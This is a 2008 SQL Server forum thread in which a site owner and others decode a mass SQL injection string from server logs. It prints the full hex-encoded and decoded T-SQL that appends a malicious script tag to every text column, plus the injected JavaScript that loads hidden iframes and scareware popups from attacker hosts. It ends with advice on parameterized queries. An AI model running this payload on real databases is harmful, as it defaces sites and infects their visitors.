Home | Contact Us | FAQ | Search & Site Map | Link to Us
Sign In | Join | Other 45 Sites in Network
Home
Discussion Groups
DB Engine
SQL ServerMSDESQL Server CE
Services
Analysis (Data Mining)Analysis (OLAP)DTSIntegration ServicesNotification ServicesReporting Services
Programming
CLRConnectivitySQLXML
Other Technologies
ClusteringEnglish QueryFull-Text SearchReplicationService Broker
General
Data WarehousingPerformanceSecuritySetupSQL Server ToolsOther SQL Server Topics
DirectoryUser Groups
Related Topics
MS AccessOther DB ProductsMS Server Products.NET DevelopmentVB DevelopmentJava DevelopmentMore Topics ...
SQL Server Forum / DB Engine / SQL Server / July 2008

Tip: Looking for answers? Try searching our database.

SQL injection attempt

Thread view: 
Enable EMail Alerts  Start New Thread
Thread rating: 
nutso fasst - 01 Jul 2008 00:48 GMT
Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
what the code in the querystring is trying to do?

?o=asc;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056
41524348415228323535292C404320564152434841522832353529204445434C415245205461
626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E
6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78
747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F
5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320574849
4C4528404046455443485F5354415455533D302920424547494E204558454328275550444154
45205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428
564152434841522834303030292C5B272B40432B275D29292B27273C73637269707420737263
3D687474703A2F2F7777772E646C3235312E636F6D2F622E6A733E3C2F7363726970743E2727
2729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040
542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445
205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-

thx,

nf
Reply to this Message
Ed Enstrom - 01 Jul 2008 01:34 GMT
> Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
> what the code in the querystring is trying to do?
>
> thx,
>
> nf

See if this helps:

http://isc.sans.org/diary.html?storyid=4565&rss
Reply to this Message
nutso fasst - 01 Jul 2008 02:14 GMT
> See if this helps:
>
> http://isc.sans.org/diary.html?storyid=4565&rss

Thanks for the quick reply.

Same nasty work. I wonder why this destructive behavior isn't prosecuted.
Surely the perps can be tracked.
Reply to this Message
TheSQLGuru - 01 Jul 2008 14:20 GMT
That isn't nearly as easy as you think.  It is very simple to hide your
tracks on the internet.  For example, you can simply take over another's
computer via a zombie program and have THAT machine execute the exploits.

Signature

Kevin G. Boles
Indicium Resources, Inc.
SQL Server MVP
kgboles a earthlink dt net

>> See if this helps:
>>
[quoted text clipped - 4 lines]
> Same nasty work. I wonder why this destructive behavior isn't prosecuted.
> Surely the perps can be tracked.
Reply to this Message
nutso fasst - 01 Jul 2008 18:27 GMT
> That isn't nearly as easy as you think.  It is very simple to hide your
> tracks on the internet.  For example, you can simply take over another's
> computer via a zombie program and have THAT machine execute the exploits.

Zombies are attempting the injection. But the injection leads to a website
with a custom domain name selling software (not to mention the various
domains hosting the .js files, which look to be all resident on nefarious
ISPs). At the least there's malicious defacing of property - I see it as
extortion. It's costing untold $millions in human resources (and mental
health issues). And if the perps are zombizing systems then it's a national
security issue.
Reply to this Message
TheSQLGuru - 01 Jul 2008 22:20 GMT
All of your statements may or may not be true, but they are completely
irrelevant and useless unless you can identify and successfully prosecute a
person, party or company for the act(s).  Even if you were able to do that
(at enormous cost that would almost certainly NOT be recouped by a
successful suit), there would be countless others still functional that
would not be worried in the least.

Now, if you were to post a youtube video of the torture and subsequent
execution of said offending parties (I am not suggesting this as a solution,
btw), that MIGHT generate enough fear to make the hackers stop, but I doubt
that again simply due to the extremely small likelyhood that they can be
identified.  I don't think any remediation is possible until we can improve
the ability to track down perps.  Best is for people to simply build apps
that don't allow for this kind of attack.  Also to develop better ways of
identifying the attacks from their source and stopping that.

Signature

Kevin G. Boles
Indicium Resources, Inc.
SQL Server MVP
kgboles a earthlink dt net

>> That isn't nearly as easy as you think.  It is very simple to hide your
>> tracks on the internet.  For example, you can simply take over another's
[quoted text clipped - 8 lines]
> national
> security issue.
Reply to this Message
nutso fasst - 01 Jul 2008 23:25 GMT
> Now, if you were to post a youtube video of the torture and subsequent
> execution of said offending parties...

My guess is that many otherwise-'civilized' folks can't help but find that
scenario appealing. But I too doubt it would solve the problem. So, we
fritter time implementing countermeasures, contemplate bandwidth blocked
with sewage, and wonder where to store the stinking bloated log files...

Thanks for replying.
Reply to this Message
nutso fasst - 01 Jul 2008 02:04 GMT
I wrote:
> Can anyone tell
> what the code in the querystring is trying to do?

Never mind. I found a conversion tool:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND
a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script
src=http://www.dl251.com/b.js></script>''') FETCH NEXT FROM Table_Cursor
INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Fortunately, this could not exec on my system. But once they start the
clowns just never give up. I checked a couple more querystrings, the only
difference is the domain name where the javascript is stored. 2 were
registered with DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A
PUBLICDOMAINREGISTRY.COM and another with XIN NET TECHNOLOGY CORPORATION.
Neither ISP has contact info. The javascript tries to put an iframe on the
page, with content from kadport.com/cgi-bin/index.cgi?ad. I did not look to
see what is dispensed from that script.

nf
Reply to this Message
Bob Milutinovic - 01 Jul 2008 02:28 GMT
> Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
> what the code in the querystring is trying to do?
>
> ?o=asc;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056

<snip>

This is the decoded output; it appears to be a script to traverse the
database 'n' populate all string columns with a reference to a malicious
script;

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35
OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script
src=http://www.dl251.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE
Table_Cursor

The culprit here's located at www.dl251.com, hosted on a botnet.

The output of the injected JavaScript is;

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://pid76.net/cgi-bin/index.cgi?ad width=0
height=0 frameborder=0></iframe>");
}
catch(e)
{
};

This points us to pid76.net, surprise surprise, another botnet-hosted
domain.

The common link here is a GoogleMail drop-box (likely irrelevant, but I do
like making these drop-boxes available for spam scrapers),
onlymailru@gmail.com

Now, onto the payload itself...

http://pid76.net/cgi-bin/index.cgi?ad redirects to
http://pid76.net/cgi-bin/ad.cgi

This in turn throws out an embedded JavaScript, which eventually leads us to
our real culprits, malware vendors selling bogus software by infecting the
victim's computer then offering to clean it for a fee;

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatead=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "updatead=update;expires="+expires.toGMTString();
try{
if((navigator.userLanguage.toLowerCase() ==
"en-us")||(if(navigator.userLanguage.toLowerCase() == "en"))) {
 w=window.open("http://spyware-quick-scan.com?wmid=1041&l=14&it=1&s=4t","w","location=0,status=0
,toolbar=0,menubar=0,directories=0,resizable=0,scrollbars=0,width=750,height=770");
 w.moveTo(0,0);
}
}
catch(e)
{
};

spyware-quick-scan.com is hosted by APS Telecom, a known spam/scam/malware
haven.

Domain registration is, as would be expected, entirely bogus (though in this
instance they didn't even attempt to hide the fact with fake data);

Domain Name: SPYWARE-QUICK-SCAN.COM
Registrant:
   n/a
   Shmid        (shmid@mikitos.com)
   n/a
   n/a
   n/a
   n/a
   ,000000
   US
   Tel. +999.999999999

I've lodged a complaint with the registrar in question, but even if action's
taken, I'm sure it won't cripple the perpetrators for longer than a few
hours.

- Bob.
Reply to this Message
nutso fasst - 01 Jul 2008 03:53 GMT
> I've lodged a complaint with the registrar in question, but even if action's
> taken, I'm sure it won't cripple the perpetrators for longer than a few
> hours.

Thanks. It's hard to believe the registrar isn't complicit, and even harder
to believe that profit from software sales is the real reason for doing it.
Reply to this Message
Uri Dimant - 01 Jul 2008 05:08 GMT
Hi
See Tony's article  as well
http://sqlblogcasts.com/blogs/tonyrogerson/archive/2008/06/28/if-only-you-d-used
-stored-procedures-you-wouldn-t-have-got-hacked.aspx

> Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
> what the code in the querystring is trying to do?
[quoted text clipped - 18 lines]
>
> nf
Reply to this Message
nutso fasst - 01 Jul 2008 18:08 GMT
> Hi
> See Tony's article  as well

http://sqlblogcasts.com/blogs/tonyrogerson/archive/2008/06/28/if-only-you-d-
used-stored-procedures-you-wouldn-t-have-got-hacked.aspx

Thanks Uri. Parameterized queries are another option:
<http://weblogs.asp.net/bleroy/archive/2004/08/18/please-please-please-learn
-about-injection-attacks.aspx>

And, of course: never use key words such as asc and desc directly from a
querystring or post without checking.

Posting here has been very educational.
Reply to this Message
 
Sign In
Join
My Latest Posts
My Monitored Threads
My Blog
My Photo Gallery
My Profile
My Homepage
Start New Thread
Enable EMail Alerts
Rate this Thread



©2009 Advenet LLC   Privacy Policy - Terms of Use
This website includes both content owned or controlled by Advenet as well as content owned or controlled by third parties.